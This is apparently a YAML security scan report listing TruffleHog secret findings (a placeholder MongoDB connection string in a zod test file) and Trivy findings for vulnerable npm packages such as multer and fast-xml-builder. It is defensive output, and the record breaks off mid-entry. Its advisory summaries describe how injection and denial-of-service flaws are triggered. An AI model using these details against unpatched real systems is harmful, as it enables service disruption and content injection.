version: unknown
location:
path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
startLine: 0
message: mongodb://username:password@host:1234/?authSource=admin
title: MongoDB secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
line: 651
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 895
DetectorName: MongoDB
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
data model. MongoDB credentials can be used to access and manipulate the database.
DecoderName: PLAIN
Verified: false
VerificationError: context deadline exceeded
VerificationFromCache: false
Raw: mongodb://username:password@host:1234/?authSource=admin
RawV2: ''
Redacted: ''
ExtraData:
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f911dc46b3477b87
ruleId: MongoDB
severity: MEDIUM
tool:
name: trufflehog
version: unknown
location:
path: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
startLine: 0
message: mongodb://username:password@host:1234/?authSource=admin&connectTimeoutMS=300000
title: MongoDB secret
description: Potential secret detected by TruffleHog
remediation: Rotate credentials and purge from history.
references: []
tags:
- secrets
- unverified
risk:
cwe:
- CWE-798
confidence: MEDIUM
likelihood: HIGH
impact: HIGH
raw:
SourceMetadata:
Data:
Filesystem:
file: /scan/node_modules/zod/src/v4/classic/tests/template-literal.test.ts
line: 652
SourceID: 1
SourceType: 15
SourceName: trufflehog - filesystem
DetectorType: 895
DetectorName: MongoDB
DetectorDescription: MongoDB is a NoSQL database that uses a document-oriented
data model. MongoDB credentials can be used to access and manipulate the database.
DecoderName: PLAIN
Verified: false
VerificationError: context deadline exceeded
VerificationFromCache: false
Raw: mongodb://username:password@host:1234/?authSource=admin&connectTimeoutMS=300000
RawV2: ''
Redacted: ''
ExtraData:
rotation_guide: https://howtorotate.com/docs/tutorials/mongo/
StructuredData: null
compliance:
owaspTop10_2021:
- A02:2021
cweTop25_2024:
- id: CWE-798
rank: 18
category: Credentials
cisControlsV8_1: *id001
nistCsf2_0:
- *id002
- *id003
pciDss4_0:
- *id004
- *id005
mitreAttack:
- *id006
- *id007
priority:
priority: 13.333333333333332
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 7e52e475110f77c7
ruleId: CVE-2026-3449
severity: LOW
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: '@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect
control flow scoping with AbortSignal'
title: CVE-2026-3449
description: Versions of the package @tootallnate/once before 3.0.1 are vulnerable
to Incorrect Control Flow Scoping in promise resolving when AbortSignal option
is used. The Promise remains in a permanently pending state after the signal is
aborted, causing any await or .then() usage to hang indefinitely. This can cause
a control-flow leak that can lead to stalled requests, blocked workers, or degraded
application availability.
remediation: https://avd.aquasec.com/nvd/cve-2026-3449
references: []
tags:
- vulnerability
- pkg:@tootallnate/once@2.0.0
risk:
cwe: &id008
- CWE-705
raw:
VulnerabilityID: CVE-2026-3449
VendorIDs:
- GHSA-vpq2-c234-7xj6
PkgID: '@tootallnate/once@2.0.0'
PkgName: '@tootallnate/once'
PkgIdentifier:
PURL: pkg:npm/%40tootallnate/once@2.0.0
UID: 22f57853d23edc3a
InstalledVersion: 2.0.0
FixedVersion: 3.0.1
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-3449
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:605e4b5b1300db1ed54e9a7df765bc7aac56fb87edbbdfda3669e95ed6e21109
Title: '@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect
control flow scoping with AbortSignal'
Description: Versions of the package @tootallnate/once before 3.0.1 are vulnerable
to Incorrect Control Flow Scoping in promise resolving when AbortSignal option
is used. The Promise remains in a permanently pending state after the signal
is aborted, causing any await or .then() usage to hang indefinitely. This can
cause a control-flow leak that can lead to stalled requests, blocked workers,
or degraded application availability.
Severity: LOW
CweIDs: *id008
VendorSeverity:
ghsa: 1
redhat: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L
V40Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P
V3Score: 3.3
V40Score: 1.9
redhat:
V3Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
V3Score: 4
References:
- https://access.redhat.com/security/cve/CVE-2026-3449
- https://github.com/TooTallNate/once
- https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a
- https://github.com/TooTallNate/once/issues/8
- https://nvd.nist.gov/vuln/detail/CVE-2026-3449
- https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612
- https://www.cve.org/CVERecord?id=CVE-2026-3449
PublishedDate: '2026-03-03T05:17:25.017Z'
LastModifiedDate: '2026-05-19T15:38:48.397Z'
context:
sbom:
name: '@tootallnate/once'
version: 2.0.0
path: /package-lock.json
compliance:
cisControlsV8_1: &id010
- control: '7.1'
title: Establish and Maintain a Vulnerability Management Process
implementationGroup: IG1
- control: '7.2'
title: Establish and Maintain a Remediation Process
implementationGroup: IG1
- control: '7.3'
title: Perform Automated Operating System Patch Management
implementationGroup: IG1
- control: '7.4'
title: Perform Automated Application Patch Management
implementationGroup: IG2
- control: '16.11'
title: Leverage Vetted Modules or Services for Application Security Components
implementationGroup: IG2
nistCsf2_0:
- &id011
function: IDENTIFY
category: ID.RA
subcategory: ID.RA-1
description: Asset vulnerabilities are identified and documented
- &id012
function: GOVERN
category: GV.SC
subcategory: GV.SC-3
description: Cybersecurity supply chain risk management processes are identified,
established, assessed, managed, and agreed upon by organizational stakeholders
pciDss4_0:
- &id013
requirement: 6.3.3
description: Security vulnerabilities are identified and managed
priority: CRITICAL
- &id014
requirement: 11.3.1
description: Internal vulnerability scans are performed
priority: HIGH
mitreAttack:
- &id015
tactic: Initial Access
technique: T1195
techniqueName: Supply Chain Compromise
subtechnique: T1195.001
subtechniqueName: Compromise Software Dependencies and Development Tools
priority:
priority: 6.671466666666666
epss: 0.00018
epss_percentile: 0.04653
is_kev: false
kev_due_date: null
components:
severity_score: 2
epss_multiplier: 1.00072
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 3bc7bf0933f4ab4f
ruleId: CVE-2026-44665
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'fast-xml-builder: fast-xml-builder: Attribute injection leading to information
disclosure or content manipulation'
title: CVE-2026-44665
description: fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input
data has quotes in attribute values but process entities is not enabled, it breaks
the attribute value into multiple attributes. This gives the room for an attacker
to insert unwanted attributes to the XML/HTML. This vulnerability is fixed in
1.1.7.
remediation: https://avd.aquasec.com/nvd/cve-2026-44665
references: []
tags:
- vulnerability
- pkg:fast-xml-builder@1.1.5
risk:
cwe: &id009
- CWE-91
raw:
VulnerabilityID: CVE-2026-44665
VendorIDs:
- GHSA-5wm8-gmm8-39j9
PkgID: fast-xml-builder@1.1.5
PkgName: fast-xml-builder
PkgIdentifier:
PURL: pkg:npm/fast-xml-builder@1.1.5
UID: e589910a79395ad7
InstalledVersion: 1.1.5
FixedVersion: 1.1.7
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44665
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:8e7a89527407be2fe370bc613bdc370fc1331784b6adb3ded33d177053fe6763
Title: 'fast-xml-builder: fast-xml-builder: Attribute injection leading to information
disclosure or content manipulation'
Description: fast-xml-builder builds XML from JSON. Prior to 1.1.7, when an input
data has quotes in attribute values but process entities is not enabled, it
breaks the attribute value into multiple attributes. This gives the room for
an attacker to insert unwanted attributes to the XML/HTML. This vulnerability
is fixed in 1.1.7.
Severity: HIGH
CweIDs: *id009
VendorSeverity:
ghsa: 3
redhat: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
V3Score: 6.1
V40Score: 8.7
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
V3Score: 6.1
References:
- https://access.redhat.com/security/cve/CVE-2026-44665
- https://github.com/NaturalIntelligence/fast-xml-builder
- https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-5wm8-gmm8-39j9
- https://nvd.nist.gov/vuln/detail/CVE-2026-44665
- https://www.cve.org/CVERecord?id=CVE-2026-44665
PublishedDate: '2026-05-13T16:16:59.093Z'
LastModifiedDate: '2026-05-18T16:16:31.7Z'
context:
sbom:
name: fast-xml-builder
version: 1.1.5
path: /package-lock.json
compliance:
owaspTop10_2021:
- A03:2021
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.362266666666663
epss: 0.00031
epss_percentile: 0.09168
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.00124
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 291094d0af7c4e5d
ruleId: CVE-2026-44664
severity: MEDIUM
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient
sanitization of XML comments'
title: CVE-2026-44664
description: fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650
in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g,
'- -'). This skip the values containing three consecutive dashes (e.g., --->...),
allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML
content. This vulnerability is fixed in 1.1.6.
remediation: https://avd.aquasec.com/nvd/cve-2026-44664
references: []
tags:
- vulnerability
- pkg:fast-xml-builder@1.1.5
risk:
cwe: &id016
- CWE-91
raw:
VulnerabilityID: CVE-2026-44664
VendorIDs:
- GHSA-45c6-75p6-83cc
PkgID: fast-xml-builder@1.1.5
PkgName: fast-xml-builder
PkgIdentifier:
PURL: pkg:npm/fast-xml-builder@1.1.5
UID: e589910a79395ad7
InstalledVersion: 1.1.5
FixedVersion: 1.1.6
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44664
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:b235fbfdb27300e8e1e953de27d6b5c66dca54b9c9cc963ff98909558f588a80
Title: 'fast-xml-builder: fast-xml-builder: Arbitrary XML/HTML injection via insufficient
sanitization of XML comments'
Description: fast-xml-builder builds XML from JSON. In 1.1.5, the fix for CVE-2026-41650
in fast-xml-parser sanitizes -- sequences in XML comment content using .replace(/--/g,
'- -'). This skip the values containing three consecutive dashes (e.g., --->...),
allowing an attacker to break out of an XML comment and inject arbitrary XML/HTML
content. This vulnerability is fixed in 1.1.6.
Severity: MEDIUM
CweIDs: *id016
VendorSeverity:
ghsa: 2
redhat: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
V3Score: 6.1
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
V3Score: 6.1
References:
- https://access.redhat.com/security/cve/CVE-2026-44664
- https://github.com/NaturalIntelligence/fast-xml-builder
- https://github.com/NaturalIntelligence/fast-xml-builder/security/advisories/GHSA-45c6-75p6-83cc
- https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-gh4j-gqv2-49f6
- https://nvd.nist.gov/vuln/detail/CVE-2026-44664
- https://www.cve.org/CVERecord?id=CVE-2026-44664
PublishedDate: '2026-05-13T16:16:58.937Z'
LastModifiedDate: '2026-05-13T16:58:09.717Z'
context:
sbom:
name: fast-xml-builder
version: 1.1.5
path: /package-lock.json
compliance:
owaspTop10_2021:
- A03:2021
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 13.349866666666665
epss: 0.00031
epss_percentile: 0.09168
is_kev: false
kev_due_date: null
components:
severity_score: 4
epss_multiplier: 1.00124
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 56ac1677596b7698
ruleId: CVE-2025-47935
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Multer vulnerable to Denial of Service via memory leaks from unclosed streams
title: CVE-2025-47935
description: Multer is a node.js middleware for handling `multipart/form-data`.
Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak
issue due to improper stream handling. When the HTTP request stream emits an error,
the internal `busboy` stream is not closed, violating Node.js stream safety guidance.
This leads to unclosed streams accumulating over time, consuming memory and file
descriptors. Under sustained or repeated failure conditions, this can result in
denial of service, requiring manual server restarts to recover. All users of Multer
handling file uploads are potentially impacted. Users should upgrade to 2.0.0
to receive a patch. No known workarounds are available.
remediation: https://avd.aquasec.com/nvd/cve-2025-47935
references: []
tags:
- vulnerability
- pkg:multer@1.4.5-lts.2
risk:
cwe: &id017
- CWE-401
raw:
VulnerabilityID: CVE-2025-47935
VendorIDs:
- GHSA-44fp-w29j-9vj5
PkgID: multer@1.4.5-lts.2
PkgName: multer
PkgIdentifier:
PURL: pkg:npm/multer@1.4.5-lts.2
UID: 99f2d2a7a48c940f
InstalledVersion: 1.4.5-lts.2
FixedVersion: 2.0.0
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-47935
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:7f8818b1b132b22a748ea60a54eaf18eb75d31944d1ce65cec7d4f2223e52d5b
Title: Multer vulnerable to Denial of Service via memory leaks from unclosed streams
Description: Multer is a node.js middleware for handling `multipart/form-data`.
Versions prior to 2.0.0 are vulnerable to a resource exhaustion and memory leak
issue due to improper stream handling. When the HTTP request stream emits an
error, the internal `busboy` stream is not closed, violating Node.js stream
safety guidance. This leads to unclosed streams accumulating over time, consuming
memory and file descriptors. Under sustained or repeated failure conditions,
this can result in denial of service, requiring manual server restarts to recover.
All users of Multer handling file uploads are potentially impacted. Users should
upgrade to 2.0.0 to receive a patch. No known workarounds are available.
Severity: HIGH
CweIDs: *id017
VendorSeverity:
ghsa: 3
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
References:
- https://github.com/expressjs/multer
- https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665
- https://github.com/expressjs/multer/pull/1120
- https://github.com/expressjs/multer/security/advisories/GHSA-44fp-w29j-9vj5
- https://nvd.nist.gov/vuln/detail/CVE-2025-47935
PublishedDate: '2025-05-19T20:15:25.863Z'
LastModifiedDate: '2026-04-15T00:35:42.02Z'
context:
sbom:
name: multer
version: 1.4.5-lts.2
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.498533333333334
epss: 0.00177
epss_percentile: 0.38785
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.00708
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9a2891a28bad4ab6
ruleId: CVE-2025-47944
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: Multer vulnerable to Denial of Service from maliciously crafted requests
title: CVE-2025-47944
description: Multer is a node.js middleware for handling `multipart/form-data`.
A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version
2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed
multi-part upload request. This request causes an unhandled exception, leading
to a crash of the process. Users should upgrade to version 2.0.0 to receive a
patch. No known workarounds are available.
remediation: https://avd.aquasec.com/nvd/cve-2025-47944
references: []
tags:
- vulnerability
- pkg:multer@1.4.5-lts.2
risk:
cwe: &id018
- CWE-248
raw:
VulnerabilityID: CVE-2025-47944
VendorIDs:
- GHSA-4pg4-qvpc-4q3h
PkgID: multer@1.4.5-lts.2
PkgName: multer
PkgIdentifier:
PURL: pkg:npm/multer@1.4.5-lts.2
UID: 99f2d2a7a48c940f
InstalledVersion: 1.4.5-lts.2
FixedVersion: 2.0.0
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-47944
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:23b421e6283eb1e1891013d3b028a410e9f21dcf0cc9f237488d859219429598
Title: Multer vulnerable to Denial of Service from maliciously crafted requests
Description: Multer is a node.js middleware for handling `multipart/form-data`.
A vulnerability that is present starting in version 1.4.4-lts.1 and prior to
version 2.0.0 allows an attacker to trigger a Denial of Service (DoS) by sending
a malformed multi-part upload request. This request causes an unhandled exception,
leading to a crash of the process. Users should upgrade to version 2.0.0 to
receive a patch. No known workarounds are available.
Severity: HIGH
CweIDs: *id018
VendorSeverity:
ghsa: 3
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
References:
- https://github.com/expressjs/multer
- https://github.com/expressjs/multer/commit/2c8505f207d923dd8de13a9f93a4563e59933665
- https://github.com/expressjs/multer/issues/1176
- https://github.com/expressjs/multer/security/advisories/GHSA-4pg4-qvpc-4q3h
- https://nvd.nist.gov/vuln/detail/CVE-2025-47944
PublishedDate: '2025-05-19T20:15:26.007Z'
LastModifiedDate: '2026-04-15T00:35:42.02Z'
context:
sbom:
name: multer
version: 1.4.5-lts.2
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.371600000000004
epss: 0.00041
epss_percentile: 0.12343
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.00164
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d58f5341093c2113
ruleId: CVE-2025-48997
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'multer: Multer vulnerable to Denial of Service via unhandled exception'
title: CVE-2025-48997
description: Multer is a node.js middleware for handling `multipart/form-data`.
A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version
2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload
file request with an empty string field name. This request causes an unhandled
exception, leading to a crash of the process. Users should upgrade to `2.0.1`
to receive a patch. No known workarounds are available.
remediation: https://avd.aquasec.com/nvd/cve-2025-48997
references: []
tags:
- vulnerability
- pkg:multer@1.4.5-lts.2
risk:
cwe: &id019
- CWE-248
raw:
VulnerabilityID: CVE-2025-48997
VendorIDs:
- GHSA-g5hg-p3ph-g8qg
PkgID: multer@1.4.5-lts.2
PkgName: multer
PkgIdentifier:
PURL: pkg:npm/multer@1.4.5-lts.2
UID: 99f2d2a7a48c940f
InstalledVersion: 1.4.5-lts.2
FixedVersion: 2.0.1
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-48997
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:b5423a207c7b90cb213319b29f5a6320e76fbba9b188f4193067f30445ba46ac
Title: 'multer: Multer vulnerable to Denial of Service via unhandled exception'
Description: Multer is a node.js middleware for handling `multipart/form-data`.
A vulnerability that is present starting in version 1.4.4-lts.1 and prior to
version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending
an upload file request with an empty string field name. This request causes
an unhandled exception, leading to a crash of the process. Users should upgrade
to `2.0.1` to receive a patch. No known workarounds are available.
Severity: HIGH
CweIDs: *id019
VendorSeverity:
ghsa: 3
redhat: 2
CVSS:
ghsa:
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
V40Score: 8.7
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
V3Score: 5.3
References:
- https://access.redhat.com/security/cve/CVE-2025-48997
- https://github.com/expressjs/multer
- https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9
- https://github.com/expressjs/multer/issues/1233
- https://github.com/expressjs/multer/pull/1256
- https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg
- https://nvd.nist.gov/vuln/detail/CVE-2025-48997
- https://www.cve.org/CVERecord?id=CVE-2025-48997
PublishedDate: '2025-06-03T19:15:39.577Z'
LastModifiedDate: '2026-04-15T00:35:42.02Z'
context:
sbom:
name: multer
version: 1.4.5-lts.2
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.565733333333334
epss: 0.00249
epss_percentile: 0.48135
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.00996
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 87e4175cbe5a176c
ruleId: CVE-2025-7338
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'multer: Multer Denial of Service'
title: CVE-2025-7338
description: Multer is a node.js middleware for handling `multipart/form-data`.
A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version
2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending a malformed
multi-part upload request. This request causes an unhandled exception, leading
to a crash of the process. Users should upgrade to version 2.0.2 to receive a
patch. No known workarounds are available.
remediation: https://avd.aquasec.com/nvd/cve-2025-7338
references: []
tags:
- vulnerability
- pkg:multer@1.4.5-lts.2
risk:
cwe: &id020
- CWE-248
raw:
VulnerabilityID: CVE-2025-7338
VendorIDs:
- GHSA-fjgf-rc76-4x9p
PkgID: multer@1.4.5-lts.2
PkgName: multer
PkgIdentifier:
PURL: pkg:npm/multer@1.4.5-lts.2
UID: 99f2d2a7a48c940f
InstalledVersion: 1.4.5-lts.2
FixedVersion: 2.0.2
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-7338
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:6f3feccc664d1f1e3cddf653f1c97b7118b5736ae9b6292dab66ae27058aa782
Title: 'multer: Multer Denial of Service'
Description: Multer is a node.js middleware for handling `multipart/form-data`.
A vulnerability that is present starting in version 1.4.4-lts.1 and prior to
version 2.0.2 allows an attacker to trigger a Denial of Service (DoS) by sending
a malformed multi-part upload request. This request causes an unhandled exception,
leading to a crash of the process. Users should upgrade to version 2.0.2 to
receive a patch. No known workarounds are available.
Severity: HIGH
CweIDs: *id020
VendorSeverity:
ghsa: 3
redhat: 2
CVSS:
ghsa:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
V3Score: 5.3
References:
- https://access.redhat.com/security/cve/CVE-2025-7338
- https://cna.openjsf.org/security-advisories.html
- https://github.com/expressjs/multer
- https://github.com/expressjs/multer/commit/adfeaf669f0e7fe953eab191a762164a452d143b
- https://github.com/expressjs/multer/security/advisories/GHSA-fjgf-rc76-4x9p
- https://nvd.nist.gov/vuln/detail/CVE-2025-7338
- https://www.cve.org/CVERecord?id=CVE-2025-7338
PublishedDate: '2025-07-17T16:15:35.227Z'
LastModifiedDate: '2026-04-15T00:35:42.02Z'
context:
sbom:
name: multer
version: 1.4.5-lts.2
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.371600000000004
epss: 0.00041
epss_percentile: 0.12343
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.00164
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 2affafc067aeae6e
ruleId: CVE-2026-2359
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'multer: Multer: Denial of Service via dropped file upload connections'
title: CVE-2026-2359
description: Multer is a node.js middleware for handling `multipart/form-data`.
A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by dropping connection during file upload, potentially
causing resource exhaustion. Users should upgrade to version 2.1.0 to receive
a patch. No known workarounds are available.
remediation: https://avd.aquasec.com/nvd/cve-2026-2359
references: []
tags:
- vulnerability
- pkg:multer@1.4.5-lts.2
risk:
cwe: &id021
- CWE-772
raw:
VulnerabilityID: CVE-2026-2359
VendorIDs:
- GHSA-v52c-386h-88mc
PkgID: multer@1.4.5-lts.2
PkgName: multer
PkgIdentifier:
PURL: pkg:npm/multer@1.4.5-lts.2
UID: 99f2d2a7a48c940f
InstalledVersion: 1.4.5-lts.2
FixedVersion: 2.1.0
Status: fixed
SeveritySource: ghsa
PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-2359
DataSource:
ID: ghsa
Name: GitHub Security Advisory npm
URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm
Fingerprint: sha256:aa2cbc6cc4142d36b776703b3db65cfa9d406900e6e0fc75d58c73b8897a08cd
Title: 'multer: Multer: Denial of Service via dropped file upload connections'
Description: Multer is a node.js middleware for handling `multipart/form-data`.
A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by dropping connection during file upload, potentially
causing resource exhaustion. Users should upgrade to version 2.1.0 to receive
a patch. No known workarounds are available.
Severity: HIGH
CweIDs: *id021
VendorSeverity:
ghsa: 3
nvd: 3
redhat: 3
CVSS:
ghsa:
V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
V40Score: 8.7
nvd:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
redhat:
V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
V3Score: 7.5
References:
- https://access.redhat.com/security/cve/CVE-2026-2359
- https://cna.openjsf.org/security-advisories.html
- https://github.com/expressjs/multer
- https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab
- https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc
- https://nvd.nist.gov/vuln/detail/CVE-2026-2359
- https://www.cve.org/CVERecord?id=CVE-2026-2359
PublishedDate: '2026-02-27T16:16:25.467Z'
LastModifiedDate: '2026-03-19T17:28:16.05Z'
context:
sbom:
name: multer
version: 1.4.5-lts.2
path: /package-lock.json
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 23.351066666666668
epss: 0.00019
epss_percentile: 0.05291
is_kev: false
kev_due_date: null
components:
severity_score: 7
epss_multiplier: 1.00076
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 80d0e617807f9c3a
ruleId: CVE-2026-3304
severity: HIGH
tool:
name: trivy
version: unknown
location:
path: package-lock.json
startLine: 0
message: 'multer: Multer: Denial of Service via malformed requests'
title: CVE-2026-3304
description: Multer is a node.js middleware for handling `multipart/form-data`.
A vulnerability in Multer prior to version 2.1.0 allows an attacker to trigger
a Denial of Service (DoS) by sending malformed requests, potentially causing resource
exhaustion. Users should upgrade to version 2.1.0 to receive a patch. No known
workarounds are available.
remediation: https://avd.aquasec.com/nvd/cve-2026-3304
references: []
tags:
- vulnerability
- pkg:multer@1.4.5-lts.2
risk:
cwe: &id022
- CWE-459
raw:
VulnerabilityID: CVE-2026-3304
VendorIDs:
- GHSA-xf7r-hgr6-v32p
PkgID: multer@1.4.5-lts.2
PkgName: multer
PkgIdentifier:
PURL: pkg:npm/multer@1.4.5-lts.2
